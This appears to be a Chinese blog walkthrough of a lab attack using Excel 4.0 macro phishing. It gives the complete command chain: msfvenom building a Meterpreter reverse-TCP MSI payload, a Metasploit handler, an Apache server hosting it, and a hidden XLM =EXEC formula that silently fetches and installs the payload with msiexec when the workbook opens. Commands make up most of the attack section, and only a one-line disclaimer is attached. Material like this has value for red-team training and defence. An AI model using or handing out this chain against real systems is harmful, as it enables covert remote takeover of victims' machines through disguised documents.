Excel宏钓鱼

Excel宏钓鱼

技术概述

Excel宏钓鱼是一种利用Office宏功能执行恶意代码的攻击手段。攻击者通过诱导用户启用宏(通常伪装成重要文档),触发恶意VBA代码从远程服务器下载并执行载荷。本实验演示了使用MSI静默安装包配合Meterpreter反向连接的完整攻击链,具有以下技术特征:

  1. 利用Excel 4.0宏表(XLM)实现代码执行,相比传统VBA宏更隐蔽
  2. 使用msiexec静默安装技术实现无感载荷部署
  3. 通过HTTP服务器分发恶意载荷,规避传统文件传输检测
  4. 建立Meterpreter反向TCP连接获取控制权限

:本实验仅用于教育目的,实际实施可能违反相关法律法规

实验环境:

  • Windows 10 (192.168.88.129)
  • Kali 2018 (192.168.88.128)
  • Excel 2016

实验步骤

攻击端配置(Kali)

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.88.128 lport=4444 -f msi -o hack.msi # 生成Windows载荷(MSI格式)

在这里插入图片描述

在这里插入图片描述

# 启动Metasploit监听
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.88.128
exploit

在这里插入图片描述

# 启动Apache服务托管恶意文件
apache2 -k start
systemctl start apache2

在这里插入图片描述

目标端操作(Windows)

打开Excel,创建宏表

在这里插入图片描述

输入Excel 4.0宏表特殊函数
=EXEC("msiexec /q /i http://192.168.88.128/hack.msi")
=HALT() # 终止宏执行防止异常提示
# 静默安装参数:/q - 无界面模式 /i - 安装指令

在这里插入图片描述

在这里插入图片描述

最后隐藏该宏表并以“启用宏的工作簿”保存

在这里插入图片描述

再次打开该工作簿,可以看到目标主机已上线,钓鱼成功!

在这里插入图片描述

攻击流程图

在这里插入图片描述

补充说明

该攻击方式的成功率主要依赖:

  1. 目标系统未安装MSI安装器补丁(KB971187)
  2. Excel安全设置未禁用XLM宏
  3. 防火墙未阻止反向TCP连接
  4. 用户手动允许宏执行(社会工程)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值